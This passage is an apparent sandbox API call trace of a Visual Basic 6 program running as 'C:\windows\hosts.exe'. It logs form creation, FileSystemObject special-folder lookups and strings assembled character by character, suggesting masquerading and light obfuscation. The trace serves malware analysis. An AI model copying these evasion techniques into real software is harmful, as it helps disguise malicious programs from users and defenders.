Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0177.492] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0xf4) returned 0xe6b6e0 [0177.492] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x15) returned 0xe62998 [0177.492] lstrlenA (lpString="Text2") returned 5 [0177.493] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x6) returned 0xe6b7e0 [0177.493] lstrlenA (lpString="ThunderRT6") returned 10 [0177.493] lstrcpyA (in: lpString1=0x28fa60, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0177.493] CreateWindowExA (dwExStyle=0x204, lpClassName=0xc1d6, lpWindowName="Text2", dwStyle=0x440100e0, X=80, Y=0, nWidth=33, nHeight=19, hWndParent=0x203e6, hMenu=0x5, hInstance=0x72940000, lpParam=0x0) returned 0x203f0 [0177.493] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x203f0, Msg=0x81, wParam=0x0, lParam=0x28f644) returned 0x1 [0177.494] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x203f0, Msg=0x83, wParam=0x0, lParam=0x28f630) returned 0x0 [0177.494] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x203f0, Msg=0x1, wParam=0x0, lParam=0x28f644) returned 0x1 [0177.495] IsWindow (hWnd=0x203f0) returned 1 [0177.495] IsWindow (hWnd=0x203f0) returned 1 [0177.496] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x203f0, Msg=0xcc, wParam=0x0, lParam=0x0) returned 0x1 [0177.496] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x203f0, Msg=0x5, wParam=0x0, lParam=0xf001d) returned 0x0 [0177.496] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x203f0, Msg=0x3, wParam=0x0, lParam=0x20052) returned 0x0 [0177.497] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x14) returned 0xe629b8 [0177.501] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x203f0, Msg=0x30, wParam=0x3c0a0c53, lParam=0x0) returned 0x1 [0177.501] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x203f0, Msg=0xd3, wParam=0xffff, lParam=0x0) returned 0x0 [0177.501] ShowWindow (hWnd=0x203f0, nCmdShow=5) returned 0 [0177.501] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x203f0, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0177.501] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0xf4) returned 0xe6b7f0 [0177.501] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x15) returned 0xe629d8 [0177.502] lstrlenA (lpString="Text1") returned 5 [0177.502] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x6) returned 0xe6b8f0 [0177.502] lstrlenA (lpString="ThunderRT6") returned 10 [0177.502] lstrcpyA (in: lpString1=0x28fa60, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0177.502] CreateWindowExA (dwExStyle=0x204, lpClassName=0xc1d6, lpWindowName="Text1", dwStyle=0x440100e0, X=40, Y=0, nWidth=33, nHeight=19, hWndParent=0x203e6, hMenu=0x6, hInstance=0x72940000, lpParam=0x0) returned 0x203ee [0177.502] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x203ee, Msg=0x81, wParam=0x0, lParam=0x28f644) returned 0x1 [0177.503] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x203ee, Msg=0x83, wParam=0x0, lParam=0x28f630) returned 0x0 [0177.504] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x203ee, Msg=0x1, wParam=0x0, lParam=0x28f644) returned 0x1 [0177.504] IsWindow (hWnd=0x203ee) returned 1 [0177.504] IsWindow (hWnd=0x203ee) returned 1 [0177.505] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x203ee, Msg=0xcc, wParam=0x0, lParam=0x0) returned 0x1 [0177.505] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x203ee, Msg=0x5, wParam=0x0, lParam=0xf001d) returned 0x0 [0177.506] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x203ee, Msg=0x3, wParam=0x0, lParam=0x2002a) returned 0x0 [0177.506] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x14) returned 0xe629f8 [0177.506] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x203ee, Msg=0x30, wParam=0x3c0a0c53, lParam=0x0) returned 0x1 [0177.506] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x203ee, Msg=0xd3, wParam=0xffff, lParam=0x0) returned 0x0 [0177.507] ShowWindow (hWnd=0x203ee, nCmdShow=5) returned 0 [0177.507] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x203ee, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0177.507] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0xdc) returned 0xe6b900 [0177.507] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x15) returned 0xe62a18 [0177.508] lstrlenA (lpString="Command3") returned 8 [0177.508] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x9) returned 0xe61cd8 [0177.508] lstrlenA (lpString="ThunderRT6") returned 10 [0177.508] lstrcpyA (in: lpString1=0x28fa60, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0177.508] lstrlenA (lpString="ThunderRT6") returned 10 [0177.508] lstrcpyA (in: lpString1=0x28f9f4, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0177.508] GetClassInfoA (in: hInstance=0x0, lpClassName="Button", lpWndClass=0x28fa20 | out: lpWndClass=0x28fa20) returned 1 [0177.508] GetClassInfoA (in: hInstance=0x72940000, lpClassName="ThunderRT6CommandButton", lpWndClass=0x28fa20 | out: lpWndClass=0x28fa20) returned 0 [0177.509] RegisterClassA (lpWndClass=0x28fa20) returned 0x2c1d7 [0177.509] CreateWindowExA (dwExStyle=0x4, lpClassName=0xc1d7, lpWindowName="Command3", dwStyle=0x44012000, X=0, Y=48, nWidth=41, nHeight=25, hWndParent=0x203e6, hMenu=0x7, hInstance=0x72940000, lpParam=0x0) returned 0x203ec [0177.509] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x203ec, Msg=0x81, wParam=0x0, lParam=0x28f644) returned 0x1 [0177.510] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x203ec, Msg=0x83, wParam=0x0, lParam=0x28f630) returned 0x0 [0177.510] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x203ec, Msg=0x1, wParam=0x0, lParam=0x28f644) returned 0x0 [0177.510] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x203ec, Msg=0x5, wParam=0x0, lParam=0x190029) returned 0x0 [0177.511] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x203ec, Msg=0x3, wParam=0x0, lParam=0x300000) returned 0x0 [0177.511] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x14) returned 0xe62a38 [0177.511] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x203ec, Msg=0x30, wParam=0x3c0a0c53, lParam=0x0) returned 0x0 [0177.512] ShowWindow (hWnd=0x203ec, nCmdShow=5) returned 0 [0177.512] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x203ec, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0177.512] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0xdc) returned 0xe6b9e8 [0177.512] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x15) returned 0xe62a58 [0177.512] lstrlenA (lpString="Command2") returned 8 [0177.717] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x9) returned 0xe61cf0 [0177.717] lstrlenA (lpString="ThunderRT6") returned 10 [0177.717] lstrcpyA (in: lpString1=0x28fa60, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0177.718] CreateWindowExA (dwExStyle=0x4, lpClassName=0xc1d7, lpWindowName="Command2", dwStyle=0x44012000, X=0, Y=24, nWidth=41, nHeight=25, hWndParent=0x203e6, hMenu=0x8, hInstance=0x72940000, lpParam=0x0) returned 0x203e8 [0177.772] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x203e8, Msg=0x81, wParam=0x0, lParam=0x28f644) returned 0x1 [0177.786] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x203e8, Msg=0x83, wParam=0x0, lParam=0x28f630) returned 0x0 [0177.848] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x203e8, Msg=0x1, wParam=0x0, lParam=0x28f644) returned 0x0 [0177.852] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x203e8, Msg=0x5, wParam=0x0, lParam=0x190029) returned 0x0 [0177.853] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x203e8, Msg=0x3, wParam=0x0, lParam=0x180000) returned 0x0 [0177.853] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x14) returned 0xe62a78 [0177.853] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x203e8, Msg=0x30, wParam=0x3c0a0c53, lParam=0x0) returned 0x0 [0177.854] ShowWindow (hWnd=0x203e8, nCmdShow=5) returned 0 [0177.854] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x203e8, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0177.854] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0xdc) returned 0xe6bad0 [0177.854] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x15) returned 0xe62a98 [0177.855] lstrlenA (lpString="Command1") returned 8 [0177.855] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x9) returned 0xe61d08 [0177.855] lstrlenA (lpString="ThunderRT6") returned 10 [0177.855] lstrcpyA (in: lpString1=0x28fa60, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0177.855] CreateWindowExA (dwExStyle=0x4, lpClassName=0xc1d7, lpWindowName="Command1", dwStyle=0x44012000, X=0, Y=0, nWidth=41, nHeight=25, hWndParent=0x203e6, hMenu=0x9, hInstance=0x72940000, lpParam=0x0) returned 0x103fa [0177.856] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103fa, Msg=0x81, wParam=0x0, lParam=0x28f644) returned 0x1 [0177.857] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103fa, Msg=0x83, wParam=0x0, lParam=0x28f630) returned 0x0 [0177.857] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103fa, Msg=0x1, wParam=0x0, lParam=0x28f644) returned 0x0 [0177.858] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103fa, Msg=0x5, wParam=0x0, lParam=0x190029) returned 0x0 [0177.858] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103fa, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0177.858] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x14) returned 0xe62ab8 [0177.858] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103fa, Msg=0x30, wParam=0x3c0a0c53, lParam=0x0) returned 0x0 [0177.859] ShowWindow (hWnd=0x103fa, nCmdShow=5) returned 0 [0177.859] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103fa, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0177.859] GetClientRect (in: hWnd=0x203e6, lpRect=0x28fbd0 | out: lpRect=0x28fbd0) returned 1 [0177.859] MapWindowPoints (in: hWndFrom=0x203e6, hWndTo=0x0, lpPoints=0x28fbd0, cPoints=0x2 | out: lpPoints=0x28fbd0) returned 8192103 [0177.859] EqualRect (lprc1=0x28fbd0, lprc2=0x28fbb0) returned 1 [0177.859] SetEvent (hEvent=0x138) returned 1 [0177.860] IsIconic (hWnd=0x203e6) returned 0 [0177.860] SendMessageA (hWnd=0x203e6, Msg=0x80, wParam=0x1, lParam=0x160381) returned 0x0 [0177.861] NtdllDefWindowProc_A (hWnd=0x203e6, Msg=0x80, wParam=0x1, lParam=0x160381) returned 0x0 [0177.864] SysReAllocStringLen (in: pbstr=0x28ef74*=0x0, psz="MSVBVM60.DLL", len=0xc | out: pbstr=0x28ef74*="MSVBVM60.DLL") returned 1 [0177.864] CharLowerBuffW (in: lpsz="MSVBVM60.DLL", cchLength=0xc | out: lpsz="msvbvm60.dll") returned 0xc [0177.865] GetModuleHandleW (lpModuleName="C:\\Windows\\system32\\MSVBVM60.DLL") returned 0x72940000 [0177.866] NtdllDefWindowProc_A (hWnd=0x203e6, Msg=0xd, wParam=0x208, lParam=0x28e3f0) returned 0x0 [0177.867] NtdllDefWindowProc_A (hWnd=0x203e6, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x100151 [0177.868] NtdllDefWindowProc_A (hWnd=0x203e6, Msg=0xd, wParam=0x208, lParam=0x28e450) returned 0x0 [0177.869] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x203f4, Msg=0xc5, wParam=0x0, lParam=0x0) returned 0x1 [0177.869] GetFocus () returned 0x0 [0177.869] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x203f2, Msg=0xc5, wParam=0x0, lParam=0x0) returned 0x1 [0177.869] GetFocus () returned 0x0 [0177.869] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x203f0, Msg=0xc5, wParam=0x0, lParam=0x0) returned 0x1 [0177.870] GetFocus () returned 0x0 [0177.870] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x203ee, Msg=0xc5, wParam=0x0, lParam=0x0) returned 0x1 [0177.870] GetFocus () returned 0x0 [0177.870] IsIconic (hWnd=0x203e6) returned 0 [0177.870] IsZoomed (hWnd=0x203e6) returned 0 [0177.870] GetClientRect (in: hWnd=0x203e6, lpRect=0x28fbc4 | out: lpRect=0x28fbc4) returned 1 [0177.870] GetWindow (hWnd=0x203e6, uCmd=0x5) returned 0x203f8 [0177.871] GetWindow (hWnd=0x203f8, uCmd=0x2) returned 0x203f6 [0177.871] GetParent (hWnd=0x203f8) returned 0x203e6 [0177.871] GetWindow (hWnd=0x203f6, uCmd=0x2) returned 0x203f4 [0177.871] GetParent (hWnd=0x203f6) returned 0x203e6 [0177.872] GetWindow (hWnd=0x203f4, uCmd=0x2) returned 0x203f2 [0177.872] GetParent (hWnd=0x203f4) returned 0x203e6 [0177.872] GetWindow (hWnd=0x203f2, uCmd=0x2) returned 0x203f0 [0177.872] GetParent (hWnd=0x203f2) returned 0x203e6 [0177.872] GetWindow (hWnd=0x203f0, uCmd=0x2) returned 0x203ee [0177.872] GetParent (hWnd=0x203f0) returned 0x203e6 [0177.873] GetWindow (hWnd=0x203ee, uCmd=0x2) returned 0x203ec [0177.873] GetParent (hWnd=0x203ee) returned 0x203e6 [0177.873] GetWindow (hWnd=0x203ec, uCmd=0x2) returned 0x203e8 [0177.873] GetParent (hWnd=0x203ec) returned 0x203e6 [0177.873] GetWindow (hWnd=0x203e8, uCmd=0x2) returned 0x103fa [0177.873] GetParent (hWnd=0x203e8) returned 0x203e6 [0177.874] GetWindow (hWnd=0x103fa, uCmd=0x2) returned 0x0 [0177.874] GetParent (hWnd=0x103fa) returned 0x203e6 [0177.875] CLSIDFromProgIDEx (in: lpszProgID="scripting.filesystemobject", lpclsid=0x28f690 | out: lpclsid=0x28f690*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0 [0177.891] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0177.891] CoCreateInstance (in: rclsid=0x28f690*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x7295a460*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28f734 | out: ppv=0x28f734*=0x3f2bf8) returned 0x0 [0177.900] SysReAllocStringLen (in: pbstr=0x28e4ec*=0x0, psz="SXS.DLL", len=0x7 | out: pbstr=0x28e4ec*="SXS.DLL") returned 1 [0177.900] CharLowerBuffW (in: lpsz="SXS.DLL", cchLength=0x7 | out: lpsz="sxs.dll") returned 0x7 [0177.900] LoadLibraryW (lpLibFileName="SXS.DLL") returned 0x72ec0000 [0177.900] GetLastError () returned 0x0 [0177.900] SetLastError (dwErrCode=0x0) [0177.901] GetProcAddress (hModule=0x72ec0000, lpProcName="SxsOleAut32RedirectTypeLibrary") returned 0x72ec207d [0177.903] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr="ADVAPI32.dll", cbMultiByte=12, lpWideCharStr=0x28d458, cchWideChar=2047 | out: lpWideCharStr="ADVAPI32.dll핸(瞩 ") returned 12 [0177.903] SysReAllocStringLen (in: pbstr=0x28e45c*=0x0, psz="ADVAPI32.dll", len=0xc | out: pbstr=0x28e45c*="ADVAPI32.dll") returned 1 [0177.903] CharLowerBuffW (in: lpsz="ADVAPI32.dll", cchLength=0xc | out: lpsz="advapi32.dll") returned 0xc [0177.904] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x76f40000 [0177.904] GetLastError () returned 0x0 [0177.904] SetLastError (dwErrCode=0x0) [0177.905] GetProcAddress (hModule=0x76f40000, lpProcName="RegOpenKeyW") returned 0x76f52459 [0177.907] GetProcAddress (hModule=0x76f40000, lpProcName="RegQueryValueW") returned 0x76f544b4 [0178.843] GetProcAddress (hModule=0x72ec0000, lpProcName="SxsOleAut32MapConfiguredClsidToReferenceClsid") returned 0x72ec171e [0178.844] FileSystemObject:IUnknown:QueryInterface (in: This=0x3f2bf8, riid=0x72970540*(Data1=0x7fd52380, Data2=0x4e07, Data3=0x101b, Data4=([0]=0xae, [1]=0x2d, [2]=0x8, [3]=0x0, [4]=0x2b, [5]=0x2e, [6]=0xc7, [7]=0x13)), ppvObject=0x28f744 | out: ppvObject=0x28f744*=0x0) returned 0x80004002 [0178.844] FileSystemObject:IUnknown:QueryInterface (in: This=0x3f2bf8, riid=0x72970750*(Data1=0x37d84f60, Data2=0x42cb, Data3=0x11ce, Data4=([0]=0x81, [1]=0x35, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xb8, [7]=0x51)), ppvObject=0x28f748 | out: ppvObject=0x28f748*=0x0) returned 0x80004002 [0178.844] FileSystemObject:IUnknown:QueryInterface (in: This=0x3f2bf8, riid=0x72970450*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28f714 | out: ppvObject=0x28f714*=0x3f2bf8) returned 0x0 [0178.844] FileSystemObject:IUnknown:Release (This=0x3f2bf8) returned 0x1 [0178.845] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x3f2bf8, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f6e0*="getspecialfolder", cNames=0x1, lcid=0x409, rgDispId=0x28f6e4 | out: rgDispId=0x28f6e4*=10014) returned 0x0 [0178.845] FileSystemObject:IDispatch:Invoke (in: This=0x3f2bf8, dispIdMember=10014, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f6b4*(rgvarg=([0]=0x28f73c*(varType=0x2, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f948, pExcepInfo=0x28f694, puArgErr=0x28f6c4 | out: pDispParams=0x28f6b4*(rgvarg=([0]=0x28f73c*(varType=0x2, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f948*(varType=0x9, wReserved1=0x0, wReserved2=0x18, wReserved3=0x0, varVal1=0x3f2c54, varVal2=0x0), pExcepInfo=0x28f694*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f6c4*=0x72a478d9) returned 0x0 [0178.846] FileSystemObject:IUnknown:AddRef (This=0x3f2c54) returned 0x2 [0178.846] FileSystemObject:IUnknown:Release (This=0x3f2c54) returned 0x1 [0178.846] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x3f2bf8, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f6e0*="getspecialfolder", cNames=0x1, lcid=0x409, rgDispId=0x28f6e4 | out: rgDispId=0x28f6e4*=10014) returned 0x0 [0178.847] FileSystemObject:IDispatch:Invoke (in: This=0x3f2bf8, dispIdMember=10014, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f6b4*(rgvarg=([0]=0x28f73c*(varType=0x2, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f948, pExcepInfo=0x28f694, puArgErr=0x28f6c4 | out: pDispParams=0x28f6b4*(rgvarg=([0]=0x28f73c*(varType=0x2, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f948*(varType=0x9, wReserved1=0x0, wReserved2=0x18, wReserved3=0x0, varVal1=0x3f2d04, varVal2=0x0), pExcepInfo=0x28f694*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f6c4*=0x72a478d9) returned 0x0 [0178.847] FileSystemObject:IUnknown:AddRef (This=0x3f2d04) returned 0x2 [0178.847] FileSystemObject:IUnknown:Release (This=0x3f2d04) returned 0x1 [0178.848] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0xfc) returned 0xe6bbb8 [0178.848] GetCurrentThreadId () returned 0xa9c [0178.848] GetCurrentThreadId () returned 0xa9c [0178.848] GetCurrentThreadId () returned 0xa9c [0178.848] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x12) returned 0xe62ad8 [0178.848] SetWindowTextA (hWnd=0x403e0, lpString="Using Shell32.dll") returned 1 [0178.848] NtdllDefWindowProc_A (hWnd=0x403e0, Msg=0xc, wParam=0x0, lParam=0xe62ad8) returned 0x1 [0178.849] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x1) returned 0xe6bcc0 [0178.849] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x12) returned 0xe62af8 [0178.849] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x12) returned 0xe62b18 [0178.849] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x15) returned 0xe62b38 [0178.849] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x28f5a8, nSize=0x104 | out: lpFilename="C:\\windows\\hosts.exe" (normalized: "c:\\windows\\hosts.exe")) returned 0x14 [0178.849] lstrcpynA (in: lpString1=0x28f494, lpString2="C:\\windows\\hosts.exe", iMaxLength=260 | out: lpString1="C:\\windows\\hosts.exe") returned="C:\\windows\\hosts.exe" [0178.849] lstrlenA (lpString="C:\\windows\\hosts.exe") returned 20 [0178.849] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x15) returned 0xe62b58 [0178.849] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x15) returned 0xe62b78 [0178.849] lstrcpyA (in: lpString1=0xe62b58, lpString2="C:\\windows\\hosts.exe" | out: lpString1="C:\\windows\\hosts.exe") returned="C:\\windows\\hosts.exe" [0178.851] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0xb) returned 0xe61d20 [0178.851] HeapFree (in: hHeap=0xe50000, dwFlags=0x0, lpMem=0xe62b78 | out: hHeap=0xe50000) returned 1 [0178.851] HeapFree (in: hHeap=0xe50000, dwFlags=0x0, lpMem=0xe62b58 | out: hHeap=0xe50000) returned 1 [0178.851] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C:\\windows", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0178.851] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C:\\windows", cbMultiByte=-1, lpWideCharStr=0x10ef8bc, cchWideChar=11 | out: lpWideCharStr="C:\\windows") returned 11 [0178.851] HeapFree (in: hHeap=0xe50000, dwFlags=0x0, lpMem=0xe61d20 | out: hHeap=0xe50000) returned 1 [0178.852] SysStringLen (param_1="C:\\windows") returned 0xa [0178.852] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\windows", cchWideChar=11, lpMultiByteStr=0x10ef614, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\windows", lpUsedDefaultChar=0x0) returned 11 [0178.853] SetWindowTextA (hWnd=0x203f2, lpString="C:\\windows") returned 1 [0178.853] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x203f2, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x5 [0178.853] GetFocus () returned 0x0 [0178.853] lstrlenA (lpString="C:\\windows") returned 10 [0178.853] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x203f2, Msg=0xc, wParam=0x0, lParam=0x10ef614) returned 0x1 [0178.853] IsWindow (hWnd=0x203f2) returned 1 [0178.854] IsWindow (hWnd=0x203f2) returned 1 [0178.875] IsWindow (hWnd=0x203f2) returned 1 [0178.875] IsWindow (hWnd=0x203f2) returned 1 [0178.875] GetFocus () returned 0x0 [0178.877] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="O", cchWideChar=1, lpMultiByteStr=0x28f74a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O\x01Àú(", lpUsedDefaultChar=0x0) returned 1 [0178.877] VarAdd (in: pvarLeft=0x28f9ac, pvarRight=0x28f8d8, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x10ef614, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0178.878] VarCat (in: pvarLeft=0x28f9fc, pvarRight=0x28f97c, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.878] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="T", cchWideChar=1, lpMultiByteStr=0x28f74a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="T\x01Àú(", lpUsedDefaultChar=0x0) returned 1 [0178.878] VarAdd (in: pvarLeft=0x28f9ac, pvarRight=0x28f8d8, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.878] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x10ef8bc, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0178.878] VarCat (in: pvarLeft=0x28f9fc, pvarRight=0x28f97c, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f74a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Àú(", lpUsedDefaultChar=0x0) returned 1 [0178.879] 